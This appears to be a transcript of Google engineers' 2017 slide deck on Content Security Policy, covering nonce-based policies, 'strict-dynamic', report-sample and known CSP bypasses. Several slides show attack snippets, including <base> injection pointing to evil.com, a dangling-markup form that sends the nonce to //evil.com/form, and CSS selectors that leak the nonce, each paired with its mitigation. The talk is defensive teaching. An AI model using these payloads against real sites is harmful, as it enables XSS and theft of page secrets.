Upgrade to Pro — share decks privately, control downloads, hide ads and more …

So we broke all CSPs... You won't guess what ha...

So we broke all CSPs... You won't guess what happened next! - Michele Spagnuolo and Lukas Weichselbaum

Last year we proved that the whitelist-based approach of Content Security Policy (CSP) is flawed and proposed an alternative based on ‘strict-dynamic’ in combination with nonces or hashes. This approach makes CSP radically easier to deploy and, at the same time, unleashes its full potential as an XSS mitigation mechanism.

In our academic paper (CSP Is Dead, Long Live CSP! On the Insecurity of Whitelists and the Future of Content Security Policy, ACM CCS, 2016), we demonstrated, using automatic checks, that 94.72% of all real-world policies can be trivially bypassed by an attacker with an XSS bug. Furthermore, we found that 75.81% of all policies are bypassable due to whitelists.

Thanks to the new ‘strict-dynamic’ approach, we were finally able to deploy an effective policy to many important Google products, such as GMail, Photos, and others. In this presentation we would like to share our experience, show examples, best practices and common pitfalls.

Finally, we share how we are addressing the recent bypasses of nonce-based policies, such as nonce exfiltration/reuse techniques and dangling markup attacks.

Michele Spagnuolo

April 20, 2017
Tweet

More Decks by Michele Spagnuolo

Other Decks in Technology

Transcript

  1. Michele Spagnuolo Senior Information Security Engineer Lukas Weichselbaum Senior Information

    Security Engineer We work in a special focus area of the Google security team aimed at improving product security by targeted proactive projects to mitigate whole classes of bugs.
  2. Summary ▷ CSP is mostly used to mitigate XSS ▷

    most CSPs are based on whitelists ◦ >94% automatically bypassable ▷ introduced 'strict-dynamic' to ease adoption of policies based on nonces
  3. “ CSP is Dead, Long Live CSP On the Insecurity

    of Whitelists and the Future of Content Security Policy ACM CCS, 2016, Vienna https://goo.gl/VRuuFN
  4. script-src 'nonce-r4nd0m'; object-src 'none'; base-uri 'none'; Recap: How do CSP

    Nonces Work? Policy based on nonces ▷ all <script> tags with the correct nonce attribute will get executed ▷ <script> tags injected via XSS will be blocked because of missing nonce ▷ no host/path whitelists ▷ no bypasses caused by JSONP-like endpoints on external domains ▷ no need to go through painful process of crafting/maintaining whitelist This part needs to be random for every response!
  5. Recap: How do CSP Nonces Work? money.example.com Content-Security-Policy: yep.com <script

    nonce="r4nd0m"> doStuff();</script> <script nonce="r4nd0m" src="//yep.com/x.js"> CSP allows CSP allows script-src 'nonce-r4nd0m'; report-uri /csp_violation;
  6. money.example.com Recap: How do CSP Nonces Work? attacker.com ">'><script>alert(42) </script>

    money.example.com/csp_violations CSP blocks script without correct nonce ">'><script src="//attacker.com"> CSP blocks source neither nonced nor whitelisted Content-Security-Policy: yep.com <script nonce="r4nd0m"> doStuff();</script> <script nonce="r4nd0m" src="//yep.com/x.js"> CSP allows CSP allows script-src 'nonce-r4nd0m'; report-uri /csp_violation;
  7. script-src 'nonce-r4nd0m' 'strict-dynamic'; object-src 'none'; base-uri 'none'; Recap: What is

    'strict-dynamic'? Strict policy ▷ grant trust transitively via a one-use token (nonce) instead of listing whitelisted origins ▷ 'strict-dynamic' in a script-src: ◦ discards whitelists (for backward-compatibility) ◦ allows JS execution when created via e.g. document.createElement('script') ▷ enables nonce-only CSPs to work in practice
  8. script-src 'nonce-r4nd0m' 'strict-dynamic'; object-src 'none'; base-uri 'none'; Recap: What is

    'strict-dynamic'? Strict policy <script nonce="r4nd0m"> var s = document.createElement("script"); s.src = "//example.com/bar.js"; document.body.appendChild(s); </script> <script nonce="r4nd0m"> var s = "<script "; s += "src=//example.com/bar.js></script>"; document.write(s); </script> <script nonce="r4nd0m"> var s = "<script "; s += "src=//example.com/bar.js></script>"; document.body.innerHTML = s; </script>
  9. > 1 Billion Users get served a strict CSP >

    150 Services that set a strict CSP header ~ 50M CSP Reports yes, there's a lot of noise :)
  10. ▷ strict CSP on-by-default for new services ▷ existing services

    can be migrated by just switching a flag (e.g. Google+) ▷ requirements: ◦ service-independent CSP configuration ◦ conformance tests (disallow inline event handlers) ◦ templates that support "auto-noncing" ▪ Closure Templates (example) ◦ sophisticated monitoring tools CSP Support in Core Frameworks
  11. One Policy to Rule Them All! script-src 'nonce-r4nd0m' 'strict-dynamic' 'report-sample'

    'unsafe-inline' https:; object-src 'none'; base-uri 'none'; script-src 'nonce-r4nd0m' 'strict-dynamic' 'report-sample' 'unsafe-inline' https:; object-src 'none'; base-uri 'none'; Effective Policy in CSP3 compatible browser (strict-dynamic support)
  12. Closure Templates with auto-noncing {namespace example autoescape="strict"} {template .test} {@param?

    s: string} <html> <script> var s = '{$s}'; </script> </html> {/template} def handle_request(self, request, response): CSP_HEADER = 'Content-Security-Policy' # Set random nonce per response nonce = base64.b64encode(os.urandom(20)) csp = "script-src 'nonce-" + nonce + "';" self.response.headers.add(CSP_HEADER, csp) ijdata = { 'csp_nonce': nonce } template_values = {'s': request.get('foo','')} self.send_template( 'example.test', template_values, ijdata) <html> <script nonce="PRY7hLUXe98MdJAwNoGSdEpGV0A="> var s = 'properlyEscapedUserInput'; </script> </html> Example handler Closure template Rendered output
  13. SHIP IT !!1 ▷ but wait... How do we find

    out if everything is still working? ▷ CSP violation reports! ▷ Problem ◦ so far most inline violation reports were NOT actionable :( ◦ no way to distinguish between actual breakage and noise from browser extensions… ◦ we receive ~50M reports / day → Noise!
  14. “ New 'report-sample' keyword Reports generated for inline violations will

    contain a sample attribute if the relevant directive contains the 'report-sample' expression
  15. ▷ report-sample governs script-sample ◦ Firefox already sends script "samples"

    ◦ new 'report-sample' keyword also includes samples for inline-event handlers! ▷ added to CSP3 and ships with Chrome 59 New 'report-sample' keyword
  16. csp-report: blocked-uri:"inline" document-uri:"https://f.bar/foo" effective-directive:"script-src" New 'report-sample' keyword <html> <script>hello(1)</script> ...

    script-src 'nonce-abc'; report-uri /csp; HTML CSP Report csp-report: blocked-uri:"inline" document-uri:"https://f.bar/foo" effective-directive:"script-src" <html> <img onload="loaded()"> ... csp-report: blocked-uri:"inline" document-uri:"https://f.bar/foo" effective-directive:"script-src" <html> <script>try { window.AG_onLoad = function(func) ... 3 different causes of violations yield the exact same report! → not possible to filter out noise from extensions Inline script Inline Event Handler script injected by browser extension
  17. csp-report: blocked-uri:"inline" document-uri:"https://f.bar/foo" effective-directive:"script-src" script-sample:"hello(1)" New 'report-sample' keyword script-src 'nonce-abc'

    'report-sample'; report-uri /csp; CSP Report csp-report: blocked-uri:"inline" document-uri:"https://f.bar/foo" effective-directive:"script-src" script-sample:"loaded()" csp-report: blocked-uri:"inline" document-uri:"https://f.bar/foo" effective-directive:"script-src" script-sample:"try { window.AG_onload = function(func)..." script-sample allows to differentiate different violation causes <html> <script>hello(1)</script> ... HTML <html> <img onload="loaded()"> ... <html> <script>try { window.AG_onLoad = function(func) ... Inline script Inline Event Handler script injected by browser extension
  18. Report Noise ▷ script-sample can be used to create signatures

    for e.g. noisy browser extensions Count script-sample Cause 1,058,861 try { var AG_onLoad=function(func){if(d... AdGuard Extension 424,701 (function (a,x,m,I){var c={safeWindow:{}... Extension 316,585 (function installGlobalHook(window) React Devtools Extension ... ... ... Nice collection of common noise signatures: https://github.com/nico3333fr/CSP-useful/blob/master/csp-wtf/README.md
  19. CSP Mitigator ▷ fast and easy CSP deployment analysis tool

    ▷ identifies parts of your application which are not compatible with CSP ▷ helps make necessary changes before deployment https://goo.gl/oQDEls DEMO
  20. CSP Frontend ▷ intelligent report deduplication strategies ◦ aggressive deduplication

    by default ▪ leverages 'script-sample' ▷ real-time filtering of violation report fields ▷ ability to drill-down to investigate further
  21. Measuring Coverage ▷ monitor CSP header coverage for HTML responses

    ▷ alerts ◦ no CSP ◦ bad CSP ▪ evaluated by the CSP Evaluator automatically
  22. Injection of <base> <!-- XSS --> <base href="https://evil.com/"> <!-- End

    XSS --> … <script src="foo/bar.js" nonce="r4nd0m"></script> ▷ Problem ◦ re-basing nonced scripts to evil.com ◦ scripts will execute because they have a valid nonce :( Credit: @jackmasa http://sebastian-lekies.de/csp/bypasses.php script-src 'nonce-r4nd0m';
  23. Injection of <base> <!-- XSS --> <base href="https://evil.com/"> <!-- End

    XSS --> … <script src="foo/bar.js" nonce="r4nd0m"></script> ▷ Solution ◦ add base-uri 'none' ◦ or 'self', if 'none' is not feasible and there are no path-based open redirectors on the origin Credit: @jackmasa http://sebastian-lekies.de/csp/bypasses.php script-src 'nonce-r4nd0m'; base-uri 'none';
  24. Replace Legitimate <script#src> ▷ Problem ◦ SVG <set> can change

    attributes of other elements in Chromium ▷ Solution ◦ prevent SVG from animating <script> attributes (fixed in Chrome 58) Credit: Eduardo Vela Nava http://sebastian-lekies.de/csp/bypasses.php <!-- XSS --> <svg><set href="victim" attributeName="href" to="data:,alert(1)" /> <!-- End XSS --> … <script id="victim" src="foo.js" nonce="r4nd0m"></script>
  25. Steal and Reuse Nonces ▷ via CSS selectors Credit: Eduardo

    Vela Nava, Sebastian Lekies http://sebastian-lekies.de/csp/bypasses.php <!-- XSS --> <style> script { display: block } script[nonce^="a"]:after { content: url("record?a") } script[nonce^="b"]:after { content: url("record?b") } </style> <!-- End XSS --> <script src="foo/bar.js" nonce="r4nd0m"></script>
  26. Steal and Reuse Nonces ▷ via dangling markup attack <!--

    XSS --> <form method="post" action="//evil.com/form"> <input type="submit" value="click"><textarea name="nonce"> <!-- End XSS --> <script src="foo/bar.js" nonce="r4nd0m"></script> Credit: Eduardo Vela Nava, Sebastian Lekies http://sebastian-lekies.de/csp/bypasses.php
  27. Steal and Reuse Nonces ▷ make the browser reload the

    original document without triggering a server request: HTTP cache, AppCache, browser B/F cache victimFrame.src = "data:text/html,<script>history.back()</script>"
  28. Steal and Reuse Nonces ▷ exploit cases where attacker can

    trigger the XSS multiple times ◦ XSS due to data received via postMessage() ◦ persistent DOM XSS where the payload is fetched via XHR and "re-synced"
  29. Mitigating Bypasses ▷ injection of <base> ◦ fixed by adding

    base-uri 'none' ▷ replace legitimate <script#src> (Chrome bug) ◦ fixed in Chrome 58+ ▷ prevent exfiltration of nonce ▪ do not expose the nonce to the DOM at all • during parsing, replace the nonce attribute with a dummy value (nonce="[Replaced]") • fixed in Chrome 59+
  30. Mitigating Bypasses ▷ mitigating dangling markup attacks? ▪ precondition: •

    needs parser-inserted sink like document.write to be exploitable ▪ proposal to forbid parser-inserted sinks (opt-in) - fully compatible with strict-dynamic and enforces best coding practices
  31. ▷ strict CSP protects from traditional XSS ▷ commonly used

    libraries and frameworks introduce bypasses ◦ eval-like functionality using a non-script DOM element as a source ◦ a problem with unsafe-eval or with strict-dynamic if done through createElement('script') Credit: Sebastian Lekies, Krzysztof Kotowicz, Eduardo Vela Nava JS Framework/Library CSP Bypasses
  32. JS Framework/Library CSP Bypasses ▷ Solution: make the framework/library CSP-aware

    ◦ add extra JS checks close to dangerous sinks ▪ "code whitelist" • isCodeWhitelisted(code) ▪ nonce checking • isScriptTagNonced(element) ◦ similar primitives apply to different frameworks/libraries
  33. jQuery 2.x ▷ example: jQuery 2.x ◦ via $.html, $.append/prepend,

    $.replaceWith ... ◦ parses <script>...</script> and puts it in a dynamically generated script tag or through eval
  34. jQuery 2.x ▷ Dropbox fixed the issue by checking nonces:

    ◦ $("#element").html("<script nonce=valid>alert(1)</script>") ◦ https://blogs.dropbox.com/tech/2015/09/csp-the- unexpected-eval/
  35. Protects against Vulnerable to CSP type Deployment difficulty Reflected XSS

    Stored XSS DOM XSS Whitelist bypasses (JSONP, ...) Nonce exfiltration / reuse techniques 3 Framework -based / gadgets 4 Whitelist-based ✘ ✘ ✘ ✔ — ⁓ 1 Nonce-only ✔ ✔ ✔ — ✔ ⁓ 2 Nonce + 'strict-dynamic' ✔ ✔ ⁓ — ✔ ✔ Hash-only ✔ ✔ ✔ — — ⁓ 2 Hash + 'strict-dynamic' ✔ ✔ ✔ — — ✔ 1 Only if frameworks with symbolic JS execution capabilities are hosted on a whitelisted origin 2 Only if frameworks with symbolic JS execution capabilities are running on the page 3 Applies to "unpatched" browsers (latest Chromium not affected) 4 Several constraints apply: framework/library used, modules loaded, ... Current state of CSP
  36. Wrapping Up ▷ CSP whitelists are broken ▷ nonces +

    strict-dynamic greatly simplify CSP rollout ▷ CSP is not a silver bullet ◦ there are bypasses with various degrees of pre-conditions and constraints ▷ Overall CSP is still a very powerful defense-in-depth mechanism to mitigate XSS
  37. Thanks! Any questions? Learn more at: csp.withgoogle.com Presentation template by

    SlidesCarnival @mikispag @we1x {lwe,mikispag}@google.com